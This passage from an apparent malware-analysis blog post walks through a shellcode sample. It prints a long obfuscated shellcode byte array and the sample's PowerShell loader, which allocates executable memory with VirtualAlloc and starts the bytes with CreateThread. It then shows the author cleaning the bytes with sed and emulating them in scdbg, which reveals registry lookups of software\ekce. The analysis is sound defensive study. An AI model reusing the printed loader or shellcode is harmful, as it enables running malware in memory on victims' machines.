,0xFF,<#si#>0x48,0x85,0xC0,0x72,0x74,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x8B,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,0xFF,0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x94,0x9D,0x00,0xFB,0xFF,<#sru#>0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x81,0xE2,0xFF,0x00,0x00,0x00,0x32,0x84,0x95,0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,0xFF,0x88,<#ev#>0x04,0x32,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,0x4C,<#oq#>0xFF,0xFF,0xFF,0x89,0x45,<#ah#>0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,<#ta#>0x5A,0x0F,0x85,0xDA,0x02,0x00,0x00,0x8B,0x45,0xD4,<#qy#>0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,<#kco#>0xD0,0x8B,0x45,0xD0,0x81,<#vo#>0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,0x50,0x03,0xDB,<#xlf#>0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x53,0x6A,<#wle#>0x00,0xFF,0x55,0xA8,0x89,0x45,<#bf#>0xF8,0x83,0x7D,<#of#>0xF8,0x00,0x0F,0x84,0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,<#xp#>0x40,<#vxw#>0x54,<#vef#>0x50,0x8B,0x85,0x4C,<#ew#>0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xF8,0x50,<#bbd#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x04,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE0,0x00,<#dfh#>0x00,0x00,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,<#hxe#>0x8B,<#od#>0x85,0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xD0,0x8B,<#bdt#>0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,0x78,<#boc#>0xFF,0xFF,0xFF,0x6A,0x60,0x8B,0x85,<#wu#>0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,<#on#>0xC0,0x04,0x8B,0x95,0x7C,0xFF,<#gjg#>0xFF,0xFF,0x03,0x82,0xE0,0x00,0x00,0x00,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,<#kiu#>0x7C,0x5F,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x55,0xD4,0x8B,0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,0xD0,0x81,0xC2,0xF8,0x00,0x00,0x00,0x8B,0xCE,0xC1,0xE1,0x03,<#zr#>0x8D,0x0C,0x89,0x03,0xD1,0x89,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,<#hxa#>0x10,0x52,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x14,0x03,0xD0,0x52,0x8B,0x85,0x50,0xFF,0xFF,0xFF,0x8B,0x40,0x0C,0x03,0x45,0xF8,0x50,0xFF,<#ro#>0x95,0x78,0xFF,0xFF,0xFF,<#yc#>0x46,0xFF,0x8D,0x3C,0xFF,0xFF,<#ypg#>0xFF,0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,0x34,0x3B,0x45,0xF8,0x0F,0x84,0xCB,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x2B,0x50,0x34,0x89,0x55,0xD8,0x8B,0x45,<#jxt#>0xF8,0x89,0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,0xA4,0x00,0x00,<#da#>0x00,0x00,0x0F,0x86,<#pyu#>0x87,0x00,<#kza#>0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,0x00,<#vv#>0x00,0x00,0x03,0x45,0xF0,0x89,<#um#>0x45,0xEC,0xEB,0x6E,0x8B,0x45,0xEC,0x8B,0x00,0x03,0x45,0xF0,0x89,<#kzd#>0x45,0xE8,0x8B,0x45,0xEC,0x83,0xC0,0x08,0x89,0x45,0xE4,0x8B,0x45,0xEC,0x8B,0x40,0x04,<#frn#>0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,0x81,0xE1,0xFF,0x0F,0x0F,0xB7,0xC9,0x83,0xF8,0x03,<#uvt#>0x75,0x10,<#dys#>0x8B,<#xss#>0x45,0xE8,0x03,0xC1,0x89,0x45,<#qsp#>0xE0,0x8B,0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,0x8D,0x3C,0xFF,0xFF,<#iow#>0xFF,0x75,0xC9,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x03,0x45,0xEC,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x83,0x38,0x00,0x77,0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,0x45,0xD0,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,<#md#>0xFF,0x8B,0x45,0xD0,0x05,0x80,0x00,0x00,0x00,0x89,0x45,0x90,0x8B,0x45,0x90,0x83,0x78,0x04,0x00,0x0F,<#hr#>0x86,0x9E,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0x80,0x00,0x00,<#has#>0x00,0x03,0x45,0xF8,<#oz#>0x89,0x45,0x8C,0xEB,0x7F,0x03,0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,<#qmp#>0xD8,0x85,0xDB,0x74,<#se#>0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,<#nhi#>0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,<#zw#>0x45,0xF8,0x89,0x45,0x88,0x8B,<#re#>0x45,<#fgs#>0x8C,0x8B,0x40,<#be#>0x10,0x03,0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,<#me#>0x8B,0x30,0xF7,0xC6,0x00,0x00,0x00,0x80,<#nn#>0x74,0x12,0x81,0xE6,0xFF,0xFF,0x00,0x00,<#odn#>0x56,0x53,<#hb#>0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0xEB,0x10,0x03,0x75,0xF8,0x83,<#md#>0xC6,0x02,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0x83,0x45,0x88,0x04,0x83,0x45,0x84,<#cyw#>0x04,0x8B,<#uf#>0x45,0x88,0x83,0x38,0x00,<#xfd#>0x75,<#uwx#>0xC1,<#kv#>0x83,0x45,0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x8B,0x40,0x28,0x03,0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,0x75,<#vr#>0xF8,0xFF,0x55,0xF4,0x6A,0x00,0xFF,0x55,0xA4,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x8D,<#go#>0x40,0x00,0x73,0x6F,0x66,0x74,0x77,0x61,0x72,0x65,0x5C,0x65,0x6B,0x63,0x65,0x00,0x00,<#mmq#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#xa#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x62,0x6E,0x6A,0x66,0x6F,0x65,0x00,<#vjy#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5E,0x67,0x3A,0x12,0x9A,0x95,0x15,0x63,<#zuj#>0x06,0xAF,0x82,0xDD,0xA0,0x4D,<#at#>0x53,0x85,0xF4,0x57,0xD5,<#mhv#>0x5D,0x57,0x6A,0xB0,0x69,0x4A,0x08,0xCA,0xD1,0x9F,0x4F,0xDE,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,<#ubx#>0x00,0x3C,0x00,0x3C,0x00,0x3A,0x00,0x3A,0x00,0x3E,0x00,0x3E,0x00,0x73,0x00,0x68,0x00,<#jc#>0x65,0x00,0x6C,0x00,0x6C,0x00,0x72,0x00,0x6D,0x00,0x3C,0x00,0x65,0x00,0x6B,0x00,0x63,0x00,0x65,0x00,0x3E,0x00,0x72,0x00,0x6D,0x00,<#sxr#>0x00,0x00,0x00,0x00,0x00,<#jd#>0x00,0x00,0x00,0x00,0x00,<#ora#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#wt#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#rea#>0x00,0x00,0x00,0x1F,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,0x8B,0x75,0x0C,<#pyc#>0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,0x38,0xDB,0xE2,<#gb#>0x50,0xA3,0x70,0x80,0x60,0x41,0xF7,0x49,0xB3,0x5A,0xE1,0x53,0xD1,0xBC,0xB4,0x6E,0xB0,0x74,0x98,0xB4,0xF5,0x3C,0x6C,0x81,0x3D,0x12,0xB7,<#zg#>0xE9,0xF5,0xC2,0x34,0x23,0xA5,0x4E,0xD7,0x50,0x8D,0x7B,0x85,0xBB,0x19,0x00,0xD8,0x76,0x7F,0x09,0xB5,0xD3,0x86,0x14,0x82,<#ir#>0x44,0x59,0x5F,<#hld#>0x43,0x87,0xCB,<#wxa#>0x68,0xF6,0x32,0x8F,0x2E,0xEA,0x06,0x31,0x45,0xF0,<#oaw#>0x91,0xDA,0xDF,0x95,0x1F,0x38,<#vm#>0x5F,0xDA,0xE1,0xF4,0x1F,0x0D,0xE4,0xB7,<#frx#>0x6B,0xAB,0x3A,0x96,0xF8,0x8A,0x5A; #wgtrs $pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40); #ykcmdtyr if($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr])))); #mmaai for ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)}; #tsaoik ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0); #wpzomec }sleep(1200);}catch{}exit; #dwkjttuue #ysiuayivua
I next copied the contents of the variable $sc32, pasting it into a file named sc.bin. I then cleaned up the shellcode by removing the entries such as <#eg#> taking advantage of sed. At the end, the finished product looked like.
remnux@remnux:/tmp$ cat sc.bin | sed -E 's/<#[a-z]*#>//g' | sed 's/0x/\\x/g' | sed 's/,//g' > sc-cleaned.bin
remnux@remnux:/tmp$ cat sc-cleaned.bin | more \x55\x8B\xEC\x81\xC4\x00\xFA\xFF\xFF\x53\x56\x57\x53\x56\x57\xFC\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x5 2\x14\x8B\x72\x28\x6A\x18\x59\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x81\x FF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B\x12\x75\xDB\x89\x5D\xFC\x5F\x5E\x5B\x8B\x45\xFC\x89\x45\xD4\x8B\x45\xD4\ ....... truncated for brevity .....
Taking a quick look from the perspective of scdbg, I see:
C:\users\securitynik>scdbg /auto /f sc-cleaned.bin Detected \x encoding input format converting... 4012cf LoadLibraryA(advapi32.dll) 401485 RegOpenKeyExA(HKLM\, ) 40154d RegOpenKeyExA(HKCU\, ) 4015e4 ExitProcess(0) Stepcount 49041
At this point, we see the shellcode interacts with the registry. However, we have no evidence of they particular keys which are being accessed. This is because the shellcode expects a parameter which points to its address in memory. Here is how that is provided via scdbg.
C:\users\securitynik>scdbg /f sc-cleaned.bin /vvv Loaded 2e6c bytes from file sc-cleaned.bin Detected \x encoding input format converting... Initialization Complete.. Max Steps: 2000000 Using base offset: 0x401000 ; Nik's comments: 0x401000 location of shellcode in memory ; This value is to be passed as a parameter to the shellcode Verbosity: 3 401000 55 push ebp step: 0 foffset: 0 eax=0 ecx=0 edx=0 ebx=0 esp=12fe00 ebp=12fff0 esi=0 edi=0 EFL 0 ; Nik's comments: esp=12fe00 - Where the stack pointer currently points ; Since the shellcode address is a 4 byte value (x86 architecture), we need to push ; This 4 byte value to the stack, just before the shellcode is called. dbg> [ESP - 10] = 00000000 [ESP - c ] = 00000000 [ESP - 8 ] = 00000000 [ESP - 4 ] = 00000000 [ESP --> ] = 00000000 ; Nik's comments: ESP points to address 12fe00 but has a value of 0x00000000 [ESP + 4 ] = 00000000 ; Nik's comments: We need this to point have a value of the shellcode address in memory [ESP + 8 ] = 00000000 [ESP + c ] = 00000000 [ESP + 10] = 00000000 [ESP + 14] = 00000000 [ESP + 18] = 00000000 dbg> .poke4 ; Nik's comments: specify we wish to add a 4 byte value Enter address to write to: (hex/reg) 0x12fe04 ; Nik's comments: The 4 byte address of ESP+4 (12fe00+4) 12fe04 Enter value to write: (hex/reg) 0x401000 ; Nik's comments: Address of shellcode in memory 401000 dbg> [ESP - 10] = 00000000 [ESP - c ] = 00000000 [ESP - 8 ] = 00000000 [ESP - 4 ] = 00000000 [ESP --> ] = 00000000 [ESP + 4 ] = 00401000 ; Nik's comments: ESP+4 now has the shellcode address in memory [ESP + 8 ] = 00000000 [ESP + c ] = 00000000 [ESP + 10] = 00000000 [ESP + 14] = 00000000 [ESP + 18] = 00000000 dbg> 4012cf LoadLibraryA(advapi32.dll) 401485 RegOpenKeyExA(HKLM\, software\ekce) 40154d RegOpenKeyExA(HKCU\, software\ekce) 4015e4 ExitProcess(0) ; Nik's comments: After running, we now see the registry keys that it is attempting to open. Stepcount 49041
That's it for me on this one. I achieved my learning objectives.
References:
Virus Total report
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
SANS FOR610 - Reverse Engineering Malware
JS Beautifier
SED Man page
scdbg shellcode analysis
No comments:
Post a Comment